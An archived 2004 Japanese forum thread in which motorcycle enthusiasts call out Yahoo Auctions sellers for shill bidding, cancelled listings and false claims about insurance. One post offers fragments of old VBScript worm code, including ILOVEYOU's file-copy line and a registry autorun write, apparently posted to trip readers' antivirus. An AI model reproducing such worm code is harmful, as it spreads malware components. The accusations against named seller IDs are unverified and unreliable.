5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

オークションバイク板 part31

1 :1:04/08/16 13:34 ID:h/pPrE9c
さてさてマターリと行ってみますか。

ネットオークションにおけるバイク関係のシュピーソ物で

 ・DQN キティ 逝ってヨシ BL入り確定 な輩
 ・詐欺 吊り上げ入札 びっくりしてしまう価格の輩
 ・日本語が不自由でワケワカラン輩             等

2ちゃんに晒しageされてもいいような連中を晒せ!
お前らの判断に任せるが、善良な出品者は晒すな。(←見極め重要)
※ニーズセンターの書込み禁止だ!(゚ロ゚)モルァ!!
※ニーズ以外でも宣伝の書込み禁止だ!!(゚ロ゚)モルァ!!
※“mystatus” “remember” “logout”などのネタも禁止だ!!!(゚ロ゚)モルァ!!

<前スレ>
オークションバイク板 part30
http://hobby6.2ch.net/test/read.cgi/bike/1090986845/

以下省略

※「オクで買ったバイクの輸送はどこがいいですか?」とかはよろず質問スレへ。
■初心者のためのよろず質問スレッド Vol.190■
http://hobby6.2ch.net/test/read.cgi/bike/1087120432/

2 :774RR:04/08/16 13:43 ID:4SSP7jPJ
Yahooオークション バイク糧
http://list1.auctions.yahoo.co.jp/jp/26308-category.html?alocale=0jp

【なんだコレ】面白オークションinバイク板
http://hobby6.2ch.net/test/read.cgi/bike/1086740279/

3 :774RR:04/08/16 13:44 ID:ptQvOpwy
質問スレ古すぎじゃね

4 :774RR:04/08/16 14:18 ID:4QoSQ8Wd
■初心者のためのよろず質問スレッド Vol.198■
http://hobby6.2ch.net/test/read.cgi/bike/1092102789/

5 :774RR:04/08/16 15:59 ID:wf8EFQXO


6 :774RR:04/08/16 18:22 ID:sz5teCmk
前スレ続き。

マジで?ダイシン本人かよ・・・!メーカーの評判はどうなんだろ?
ファディダディぐらい人気ないと思うが。

7 :774RR:04/08/16 18:51 ID:8UD5gopb
┏┓                  ┏━━━━━━━━━━━┓                  ┏┓
┃┗┓              ┏┛                 ┗┓              ┏┛┃
┃  ┗┓          ┏┛                     ┗┓          ┏┛  ┃
┃    ┗┓      ┏┛                        ┗┓      ┏┛    ┃
┃      ┗┓  ┏┛                            ┗┓  ┏┛      ┃
┗┓      ┗━┫  ┏━━━━━━┓  ┏━━━━━━┓  ┣━┛      ┏┛
  ┗┓        ┃  ┗┓        ┏┛  ┗┓        ┏┛  ┃        ┏┛
    ┗┓      ┃    ┗┓    ┏┛      ┗┓    ┏┛    ┃      ┏┛
      ┗┓    ┃      ┗┓┏┛          ┗┓┏┛      ┃    ┏┛
        ┗━━┫        ┗┛              ┗┛        ┣━━┛
              ┗┓            ┏┳┳┳┓            ┏┛
                ┗┓          ┃┃┃┃┃          ┏┛   
                  ┗┓        ┃┃┃┃┃        ┏┛
                    ┗┓      ┻┻┻┻┻      ┏┛
                ┗━━━━━━━━━━━┛


8 :774RR:04/08/16 19:13 ID:yDR4Rilz
ダイシンって昔は結構ちゃんとしていたメーカーだと思う。
今も当時物だけどSRの乾式クラッチキットとかオクに出してるね。
それと今月号のミスターバイクBGにホンダのNS系ダイシンフルチューンみたいのが出てた。
かなり気合い入ってそうだったから、当時はレースも頑張っていたんだと思う。
今は駄目っぽいけど、特に大型SS用のスリップオンは酷そう。サイレンサーちっこいよ。w


9 :774RR:04/08/16 19:37 ID:eSkaFs7z
また評価マイナスですよー


10 :774RR:04/08/16 21:43 ID:95/7XIzJ
■初心者のためのよろず質問スレッド Vol.199■
http://hobby6.2ch.net/test/read.cgi/bike/1092658066/

11 :774RR:04/08/17 07:59 ID:IA7WmqQ4
11

12 :774RR:04/08/17 08:59 ID:dIuTvNj4
http://page3.auctions.yahoo.co.jp/jp/show/bid_hist?aID=c65941735



13 :774RR:04/08/17 09:35 ID:PgEdNmkA
KRP

14 :774RR:04/08/17 11:22 ID:0SIaL8ZU
前スレ終了間際の最悪DQN香具師・・・

  988 :774RR :04/08/16 23:40 ID:s1+wA6R6
   お前等さ言いたい事言ってるけど
   会社が採算割れ近い値段で落札されて得するとでも思ってるのかよ?
  別に騙してるわけじゃないだろ?
   オークションのシステムを最大限に生かしきってるだけだ。
   吊り上げして何が悪い!そんなことはどこでもやってる事なんだよ糞が。
   ここでうだうだ吠えてるんじゃなくて、直接いってこいや!

吊り上げして何が悪いって・・・・悪質なガイドライン違反だろ?
別に騙している訳じゃない?正当なオークションだと騙しているんだろ?
どこでもやっている事・・・・犯罪者心理の見本的発言。

こういう基地害がいるからヤフオクも儲かるんだよな〜。
基地害KRPいその「bmzuki」もどんどん悪評価かせいでますよw

15 :774RR:04/08/17 12:27 ID:5dHdyRV+
だからそれは釣り師だってばさ

16 :774RR:04/08/17 17:32 ID:qrAEyvou
バイク乞食は、うだうだ五月蝿い。

17 :774RR:04/08/17 18:44 ID:5fiFo1VE

ルンペン 

18 :774RR:04/08/17 18:57 ID:Y13GgJ08
おんなじものシュピーンしてる
両方に落札があったらどうすんだろ…

ttp://page7.auctions.yahoo.co.jp/jp/auction/g25179802
ttp://page7.auctions.yahoo.co.jp/jp/auction/g24954023

19 :774RR:04/08/17 19:18 ID:/rcUycI4
>>16
乞食業者がほざいてますがw
>>18
どうすんだろ、ってどちらか遅い入札者の方の出品を取り消すだけだろ?
ここで晒されるヤフオク業者なんて、入札者のある出品を取り消すのなんて
当たり前の常識なんだろうからさ。

20 :774RR:04/08/17 20:34 ID:v4t+Am3W
ヤフオクでバイク買うやつってたいしてメカも判ってない癖に自分で直すと
言い切る奴多いよな。これも時代か?

21 :774RR:04/08/17 20:38 ID:j2OG3NLa
http://page2.auctions.yahoo.co.jp/jp/show/qanda?aID=b54278691
ZRX400中古美品☆車検不要の250登録です 

22 :774RR:04/08/17 20:39 ID:/rcUycI4
再三の出品取り消しでやっと落札・・・
http://page5.auctions.yahoo.co.jp/jp/auction/e39880624
と思ったら速攻で出品ID変えて出品
http://page5.auctions.yahoo.co.jp/jp/auction/e40443873
しかも現状の入札者まで一緒w
またispeedhiが愛用していた吊り上げ用IDのhanibo41で
吊り上げバッチリですね。さすがバイク乞食KRPですよ。

23 :774RR:04/08/17 20:42 ID:o+ftBQB2
男爵祭り開催中!

【空を】2st車の走行規制を!15【子供たちへ】
http://hobby6.2ch.net/test/read.cgi/bike/1089204933/l50

24 :774RR:04/08/17 20:55 ID:/rcUycI4
http://page6.auctions.yahoo.co.jp/jp/show/bid_hist?aID=f26920704
ストア登録していないクソいそのID、ispeedhiにもさすがの最終日、
hanibo41光臨ですよw  陸王やメグロの方にも最強吊り上げID軍団の
eyeballspやxb12sがそろそろ光臨か?w

25 :774RR:04/08/17 20:58 ID:qrAEyvou
あーいそがしいー

26 :774RR:04/08/17 21:16 ID:w44Tnqu0
なんか、終了間際にウオッチしていて、吊り上げるの大変だろうに。
ソフトでもあんのかな?
いずれにしても、売れないのは変わらんのだから、
売りたい金額(かつ、適正な価格)からスタートすりゃ良いのにね。
バカのひとつ憶え見たく一律\1- スタートにしなくても、、、

27 :774RR:04/08/17 22:45 ID:/rcUycI4
http://page6.auctions.yahoo.co.jp/jp/show/bid_hist?aID=f26920704
予定通り順調に取り消し終了〜 本気のアフォだね。

28 :774RR:04/08/17 23:42 ID:4YoDFSv9
ほんとイソタンばかまるだしです

29 :774RR:04/08/18 00:00 ID:lA31sYSB
前スレの盗難サイクロン祭りの結果を誰か教えてくだちい。
ノートンが反応してログ消しまくるので、後半見てません。

30 :774RR:04/08/18 00:05 ID:oL6tGdGF
>>29
なぜノートンの除外リストに入れないのか

31 :774RR:04/08/18 00:14 ID:GE2FEcnb
つまんねー事してんじゃねーよ!お前ら本当に暇人だな。
店の経営がどんだけ大変かお前ら全然分かってないみたいだな。

32 :774RR:04/08/18 00:21 ID:lA31sYSB
>30
Netsky.cの亜種に2月常駐されて駆除できなくて、へたに除外リストに入れられん。
それに反応するの前スレだけだし。他にも反応してる方居たみたいだし。
つーか、結果を教えれ。


33 :774RR:04/08/18 00:53 ID:X4zl3JsG
>>31
そんな詐欺みてぇな店は迷惑だからさっさと畳め。な?

34 :774RR:04/08/18 01:13 ID:n23QB9a2
>>20
なんでだろうな、夏はバイクに乗りたくなる人が増えるからかね
ある程度修理できる人にとって現物を見ないで手をだすのはあぶいからな
状態を説明している人がどれほどの整備経験があるかわからん
しろーとかも知れんししろーとを装っている悪い子チャンかもしれん

エンジンかからない不動車を落札してなおせずに再出品
そのくせ説明にはキャブのOHでなおると思いますだと

不動車をその場で修理して乗って帰ると言ったり、
業者出品の不動車の修理見積もりを聞いてみたり

7,8月になって不動車高いよ冬になるまで松
落札したけど説明と違ってあまりにも状態が悪くってキャンセルしたひとおるか?

35 :774RR:04/08/18 02:37 ID:Z5wuSrTv
>>31
少なくとも俺は「店」と思っていないから気にするな

36 :774RR:04/08/18 08:58 ID:jC1NkkoP
>>31
そんな汚え真似しないと続けられない店なんて存在価値のかけらも無いから
辞めてくれ、って願っているんだよ、みんな。そんな事も分からない基地害が
わざわざ自ら晒し者になりにくるんじゃねえよ
>>35
ま、そういう事になるのがオチだな。禿堂。

37 :774RR:04/08/18 13:29 ID:3OlnP3eH
浮上!

38 :20:04/08/18 19:00 ID:zKwRi00L
>>34 いや、俺もバイク屋なのよ。でね、バイクやだけど下取りで出たどうにもならない車両を
格安で出したりするんだけどさ。

>不動車をその場で修理して乗って帰ると言ったり、
>業者出品の不動車の修理見積もりを聞いてみたり

こんな奴ばっかりなのよ。しかも人によっては自走で変えるとか言い出すのさ。
そもそも部品鳥にジャンクで出してる車両なのにな。
確かに業者もおかしいやつが多いが、買い手も相当おかしい奴が増えたと思うな。
そもそも直すのだってかねかかるんだし、金が無いならバイクなんて乗れないと思うんだがナ。


39 :774RR:04/08/18 19:06 ID:3wdeKJdo
>>38
お前がジャンクだと表記しないで売ってるんじゃないのか?
ジャンク品を引き取り時に自走で帰るなんていう池沼はいねえよ

40 :774RR:04/08/18 19:48 ID:byGdA0dW
http://page9.auctions.yahoo.co.jp/jp/auction/k6188321

赤いね

41 :774RR:04/08/18 20:43 ID:GE2FEcnb
>>40=出品者本人
本人宣伝ごくろうさん(プ

42 :774RR:04/08/18 21:00 ID:NnP6PWB1
>>40に質問で「通常の三倍ですか?」と聞いた椰子は神

43 :774RR:04/08/18 21:31 ID:rB8yGAUa
ヒーローがいるな。コメント楽しみ。

ベガー



44 :774RR:04/08/18 21:52 ID:DmjT1jLu
マフラー入札してて案外安く落とせそうだと思ってたら
ウォッチリストから突然消えた…
晒すほどじゃないんだけど、結構こういうの多いんだねぇ、と実感
開始価格は自分が最低売ってもOKな金額にしときゃ良いのに

45 :774RR:04/08/18 22:28 ID:NnP6PWB1
>>40
あれ…これって終了してたっけ(°Д°)

46 :774RR:04/08/18 22:47 ID:rFIByERs
21時過ぎに終了! 

47 :Joker:04/08/18 22:58 ID:a2kWEBrg
こんなやつからバイク買えねぇ・・・ってか買わないけど
http://page8.auctions.yahoo.co.jp/jp/show/qanda?aID=h17608720
現チャのナンバーの色についての問答ワラタ出品者の負けだな・・・

48 :774RR:04/08/18 23:02 ID:67NrPMVm
黄色ナンバーがない自治体があるわけだし
町田がどうなんかは知らんけど

49 :774RR:04/08/18 23:07 ID:xVPw0+0w
>>47
本当はいけないのですが、現在自賠の方が切れたまま乗り回しています^^;

だとさ、自賠責2年付きってのは嘘だと白状してるよ



50 :Joker:04/08/18 23:15 ID:a2kWEBrg
>黄色ナンバーがない自治体があるわけだし
ほぉ〜それは知りませんでした勉強になります^^;
でもこいつは黄色ナンバーは80cc以下ですって言い切ってるし やっぱ只の無知かと・・・
自賠責切れで乗ってるなんて・・・・ピーポくん呼びまそう

51 :774RR:04/08/18 23:21 ID:xVPw0+0w
自賠責18年8月まで付いてるって言って、
落札者がそれを考慮して入札したら詐欺だよなぁ
無保険車両運転してるし・・・
マジ、こんなやつからバイク買えないよねぇ

52 :774RR:04/08/18 23:30 ID:iPN2G4Fg
>>50
呼ぶべしだね>ピーポくん

53 :774RR:04/08/18 23:43 ID:/B+/qXJO
http://page7.auctions.yahoo.co.jp/jp/auction/g25179802
http://page7.auctions.yahoo.co.jp/jp/auction/g24954023


54 :774RR:04/08/18 23:50 ID:/B+/qXJO
プレゼント
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))


55 ::04/08/18 23:54 ID:67NrPMVm
頼むでぇ

56 :774RR:04/08/18 23:54 ID:LzFuBVCk
まあ大阪市内は125以下まで二種は全部黄色なんだがw

普通は90は黄色だろ。
カブの90だって普通に黄色ナンバーで走ってるし。
90以上がピンクになるんかな、一般的には。
ジョーカーって何ccかと思って調べたらやっぱ89ccだった。

町田は黄色がないんかな?

57 :Joker:04/08/18 23:55 ID:a2kWEBrg
勢いで通報しますた! ( ̄- ̄)ゞ

58 :774RR:04/08/19 00:05 ID:HYYcw02R
>>54
サンクス。ノートンチェック、ちゃんとはずれてた。

59 :774RR:04/08/19 00:12 ID:zpGoeugR
>>58
うちもノートンだけどどうやって外した?外したままでも良いの?

60 :774RR:04/08/19 00:39 ID:HYYcw02R
>>59
左上のオプション−AUTO-PROTECT−除外で、
Jane2ch(カチューシャなど)のログファイルフォルダを指定。
ノートン自身は切らない。


61 :20:04/08/19 01:49 ID:PW54V/bd
>>39 それがなぁ、夏のせいか部品取りカテに部品取りだって出品してるにもかかわらず、あんだよ。
じゃなきゃそんなに腹も立たないさ。いくらなんでも自走で長距離を保証できない車両を車体カテゴリになんて出せないだろ。

夏の終わりはまだ遠いなぁ。

62 :774RR:04/08/19 02:24 ID:TGV0apPH
ttp://page4.auctions.yahoo.co.jp/jp/auction/d50997878?

これのtaka 厨房じゃないのにね
まともに走れるようにするには部品代いくらかかるのかわからんようで・・

部品鳥、原2以上のスクタ、実働、外装きれいだと変な人イパーイいるよ

63 :59:04/08/19 02:31 ID:zpGoeugR
>>60
レスありがd
うまくいきました

64 :774RR:04/08/19 04:56 ID:w4ulup2Z
>>56
漏れのところの近くの田舎だと確か50も125も全部ピンクだよ。

65 :774RR:04/08/19 09:21 ID:2x9J8hCW
ttp://page9.auctions.yahoo.co.jp/jp/auction/k5893980

>万一キャンセルの場合キャンセル料としてシステム料¥3.675の他、別途¥20.000のご負担を頂きますので


システム料は分かるんだけど 別途二万って…
こういうのよくあるけど 法的効果はないから払わなくてもいいんだよね?

66 :774RR:04/08/19 13:15 ID:X/HsG/Ch
お客さんがキャンセルした場合はキャンセル料よこせ、
お店がキャンセルした場合には何か文句ある?

ヤフオクってこれがまかり通ってるよね

16 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)